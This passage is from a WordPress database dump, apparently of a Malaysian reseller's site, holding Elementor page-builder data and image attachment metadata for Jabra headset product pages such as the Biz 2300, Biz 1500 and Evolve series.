\\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7f07070\",\"elType\":\"section\",\"settings\":{\"structure\":\"34\"},\"elements\":[{\"id\":\"7909a7f\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5bb3037\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"349a8fd\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/85RJqPjfjng\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"a7a7db0\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"a1a4e97\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1a4c36b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b09d5f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a83600\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"6a528d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"21f7fb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2877 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD_Duo.png\\\" alt=\\\"\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0869d9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"bec7706\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300<\\/strong><\\/h2><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8f9ee62\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"27b34fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"4b9598c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300 QD<\\/strong><\\/h2><p>Jabra Biz\\u2122 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35b2553\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4047bd4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2876 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD.png\\\" alt=\\\"\\\" width=\\\"186\\\" height=\\\"186\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"175e85c\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"519e230\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6bfb90c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2877 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD_Duo.png\\\" alt=\\\"\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9e4889b\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"b26b188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"solution-group-card__product-name ng-binding\\\" style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300 QD DUO<\\/strong><\\/h2><p>Jabra Biz\\u2122 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ec1e2e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"7187165\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"8d1d85b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 1500<\\/strong><\\/h2><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b92f5f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e6008c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2879 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_QD.png\\\" alt=\\\"\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e34ebbb\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"48b05fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cb3f7ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\"><img class=\\\" wp-image-2878 alignnone\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_USB.png\\\" alt=\\\"\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73b78bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"9a82801\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 1500 DUO USB<\\/strong><\\/h2><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a829b4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3b4834e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b38b08e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e8e065f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7b07964\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5013,2852,'_wp_attached_file','2019/02/JabraEvolve65t_ProductImage.png'),(5014,2852,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:39:\"2019/02/JabraEvolve65t_ProductImage.png\";s:5:\"sizes\";a:2:{s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:39:\"JabraEvolve65t_ProductImage-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:37:\"JabraEvolve65t_ProductImage-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5015,2852,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.5239885032058371194807477877475321292877197265625;s:5:\"bytes\";i:1428;s:11:\"size_before\";i:13569;s:10:\"size_after\";i:12141;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1428;s:11:\"size_before\";i:13569;s:10:\"size_after\";i:12141;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(5016,2853,'_wp_attached_file','2019/02/Evolve_80.png'),(5017,2853,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:21:\"2019/02/Evolve_80.png\";s:5:\"sizes\";a:2:{s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"Evolve_80-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"Evolve_80-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5018,2853,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.683449712115642427079365006648004055023193359375;s:5:\"bytes\";i:2887;s:11:\"size_before\";i:16326;s:10:\"size_after\";i:13439;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:2887;s:11:\"size_before\";i:16326;s:10:\"size_after\";i:13439;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}}}'),(5019,2854,'_wp_attached_file','2019/02/Jabra_Evolve75e.png'),(5020,2854,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:27:\"2019/02/Jabra_Evolve75e.png\";s:5:\"sizes\";a:2:{s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:27:\"Jabra_Evolve75e-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:25:\"Jabra_Evolve75e-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5021,2854,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.2903023234951120912228361703455448150634765625;s:5:\"bytes\";i:1370;s:11:\"size_before\";i:11147;s:10:\"size_after\";i:9777;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.28999999999999914734871708787977695465087890625;s:5:\"bytes\";i:1370;s:11:\"size_before\";i:11147;s:10:\"size_after\";i:9777;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}}}'),(5022,2855,'_wp_attached_file','2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png'),(5023,2855,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:65:\"2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\";s:5:\"sizes\";a:2:{s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:65:\"954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:63:\"954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5024,2855,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.57476717624319206834115902893245220184326171875;s:5:\"bytes\";i:2228;s:11:\"size_before\";i:11382;s:10:\"size_after\";i:9154;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.57000000000000028421709430404007434844970703125;s:5:\"bytes\";i:2228;s:11:\"size_before\";i:11382;s:10:\"size_after\";i:9154;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}}}'),(5025,2856,'_wp_attached_file','2019/02/Evolve_65.png'),(5026,2856,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:21:\"2019/02/Evolve_65.png\";s:5:\"sizes\";a:2:{s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"Evolve_65-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"Evolve_65-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5027,2856,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:18.520503886357545297869364731013774871826171875;s:5:\"bytes\";i:2073;s:11:\"size_before\";i:11193;s:10:\"size_after\";i:9120;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:2073;s:11:\"size_before\";i:11193;s:10:\"size_after\";i:9120;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(5028,2857,'_wp_attached_file','2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png'),(5029,2857,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:65:\"2019/02/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\";s:5:\"sizes\";a:2:{s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:65:\"752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:63:\"752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5030,2857,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.546053179961656809382475330494344234466552734375;s:5:\"bytes\";i:2105;s:11:\"size_before\";i:11997;s:10:\"size_after\";i:9892;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.550000000000000710542735760100185871124267578125;s:5:\"bytes\";i:2105;s:11:\"size_before\";i:11997;s:10:\"size_after\";i:9892;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(5031,2858,'_wp_attached_file','2019/02/Evolve_30_.png'),(5032,2858,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:22:\"2019/02/Evolve_30_.png\";s:5:\"sizes\";a:2:{s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"Evolve_30_-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"Evolve_30_-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5033,2858,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:20.782616535930035439605489955283701419830322265625;s:5:\"bytes\";i:2305;s:11:\"size_before\";i:11091;s:10:\"size_after\";i:8786;s:4:\"time\";d:1.149999999999999911182158029987476766109466552734375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.780000000000001136868377216160297393798828125;s:5:\"bytes\";i:2305;s:11:\"size_before\";i:11091;s:10:\"size_after\";i:8786;s:4:\"time\";d:1.149999999999999911182158029987476766109466552734375;}}}'),(5034,2859,'_wp_attached_file','2019/02/Evolve_20.png'),(5035,2859,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:21:\"2019/02/Evolve_20.png\";s:5:\"sizes\";a:2:{s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"Evolve_20-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"Evolve_20-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5036,2859,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:20.965226167538304480331134982407093048095703125;s:5:\"bytes\";i:2285;s:11:\"size_before\";i:10899;s:10:\"size_after\";i:8614;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.969999999999998863131622783839702606201171875;s:5:\"bytes\";i:2285;s:11:\"size_before\";i:10899;s:10:\"size_after\";i:8614;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}}}'),(5081,2867,'_wp_attached_file','2019/02/Evolve_20_SE_Mono.png'),(5082,2867,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:29:\"2019/02/Evolve_20_SE_Mono.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Evolve_20_SE_Mono-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Evolve_20_SE_Mono-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:29:\"Evolve_20_SE_Mono-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:29:\"Evolve_20_SE_Mono-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:29:\"Evolve_20_SE_Mono-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:27:\"Evolve_20_SE_Mono-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5043,1532,'_elementor_version','2.5.14'),(5045,2861,'_wp_page_template','template-fullwidth.php'),(5046,2861,'_elementor_edit_mode','builder'),(5047,2861,'_elementor_template_type','post'),(5048,2861,'_elementor_data','[{\"id\":\"9b05eed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e3e83dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"272a30b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra.<\\/h2><h3>Sound that\\u2019s engineered for you<\\/h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those you\\u2019re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.<\\/p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba72cc4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c728c08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"63d6963\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra Evolve Series<\\/h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"828f173\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1f337bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a63143\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve.jpg\",\"id\":2851},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05c6f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5625496\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Better concentration, greater productivity<\\/h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.<\\/p><ul><li>World-class speakers to deliver amazing sound for calls and music.<\\/li><li>Call-management features allow for incredible ease-of-use..<\\/li><li>Compatible with all leading UC 